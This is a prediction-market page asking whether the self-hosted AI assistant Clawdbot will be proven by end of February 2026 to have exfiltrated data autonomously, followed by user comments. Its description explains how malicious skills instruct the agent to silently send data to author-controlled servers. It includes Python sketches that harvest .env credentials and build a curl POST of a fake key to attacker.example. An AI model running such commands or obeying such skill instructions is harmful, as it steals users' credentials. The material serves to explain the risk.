MANIFOLD
Will a Clawdbot have been proven to have exfiltrated, without help from its human, to another host by end of February 2026?
29 · Ṁ1k · Ṁ2.6k · Mar 3
41% chance

Resolution criteria

This market resolves YES if credible security research or official documentation publicly demonstrates that a Clawdbot instance (including any rebranded versions such as Moltbot or OpenClaw) has exfiltrated data to a remote host without direct human instruction or approval at the time of exfiltration. The exfiltration must occur autonomously through the bot's own actions—not through manual user commands or intentional data transfers.

Resolution sources may include:

  • Published security research from reputable cybersecurity firms or independent researchers

  • Official vulnerability disclosures or CVE reports

  • Anthropic or the Clawdbot project's official security advisories

  • Peer-reviewed security analyses

The exfiltration must be proven to have occurred without human assistance in executing the actual data transfer (though initial setup or configuration by a human is acceptable). Proof-of-concept demonstrations count if they show successful autonomous exfiltration. The market resolves NO if no such evidence emerges by February 28, 2026, 11:59 PM UTC.

Background

Clawdbot (later renamed Moltbot, then OpenClaw) experienced explosive viral growth between December 2025 and January 2026, with at least 42,665 instances publicly exposed on the internet and 5,194 instances verified as vulnerable. Developed by Austrian engineer Peter Steinberger, the self-hosted personal AI assistant runs on users' own hardware and integrates with multiple messaging platforms.

Of verified instances, 93.4% exhibit critical authentication bypass vulnerabilities enabling unauthenticated access to the gateway control plane, with potential for Remote Code Execution. Internal testing demonstrated successful exfiltration of critical credentials, including API keys and service tokens from .env files, as well as messaging platform session credentials.
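The credential-harvesting step described above comes down to reading machine-parseable secrets off the compromised host. The sketch below is illustrative only: the file contents, key names, and values are invented, not taken from the actual project; it shows why a plaintext .env file is an easy target once an attacker has any read access.

```python
# Hypothetical sketch: once an attacker can read files on an agent host,
# secrets stored in a plaintext .env file are trivially harvested.
# Key names and values below are fake and for illustration only.

def parse_env(text: str) -> dict[str, str]:
    """Parse simple KEY=VALUE lines, skipping comments and blanks."""
    secrets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        secrets[key.strip()] = value.strip().strip('"')
    return secrets

sample = """
# example secrets an agent host might hold (values are fake)
ANTHROPIC_API_KEY="sk-fake-123"
TELEGRAM_BOT_TOKEN=000000:fake
"""

harvested = parse_env(sample)
print(sorted(harvested))  # lists which credential names would be exposed
```

Nothing here is specific to Clawdbot; the point is that any process with filesystem read access, including a hijacked agent, can recover every token the assistant was configured with.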

Considerations

The tool has facilitated active data exfiltration: skills have explicitly instructed the bot to execute curl commands that send data to external servers controlled by the skill author, with the network call occurring silently and without user awareness. A compromised autonomous agent can execute arbitrary code, exfiltrate credentials, and persist indefinitely, which distinguishes it from simpler chatbots that merely leak conversations.
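A hedged sketch of the pattern described above: a malicious skill tells the agent to run a curl command that POSTs local data to a server the skill author controls. The attacker URL and payload here are hypothetical, and the command is constructed but deliberately never executed.

```python
# Sketch of what a skill-injected exfiltration call amounts to.
# URL and payload are hypothetical; the argv is built but NOT run.
import shlex

def build_exfil_command(data: str, attacker_url: str) -> list[str]:
    """Return the argv a malicious skill's curl instruction would produce."""
    return [
        "curl",
        "--silent",          # suppresses output: nothing for the user to notice
        "--max-time", "5",   # fail fast so the agent's task isn't visibly delayed
        "-X", "POST",
        "--data", data,      # e.g. harvested .env contents
        attacker_url,
    ]

cmd = build_exfil_command("ANTHROPIC_API_KEY=sk-fake-123",
                          "https://attacker.example/collect")
print(shlex.join(cmd))
```

The design point is how little machinery is needed: because the agent already has shell access to follow instructions, a single quiet HTTP POST is indistinguishable from its ordinary tool use.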

This description was generated by AI.


What if someone tells their bot to make money on Manifold and it discovers the perfect opportunity to insider-trade this market?

@SpencerPogorzelski you could also accuse me of baiting 😏

I am surprised Manifold does not discuss it.

That is a seven-day Google Trends plot.

The description mentions 42k, but 8 hours after this market's creation I saw a mention of 150k instances already. I have seen the opinion that the singularity has happened, in the sense that it is impossible to track what this collaborative system of AI bots is doing.

@Henry38hw I see a new user, Clawdbotalex, has just appeared on Manifold.

@Henry38hw right? I wouldn’t dismiss this moment too quickly
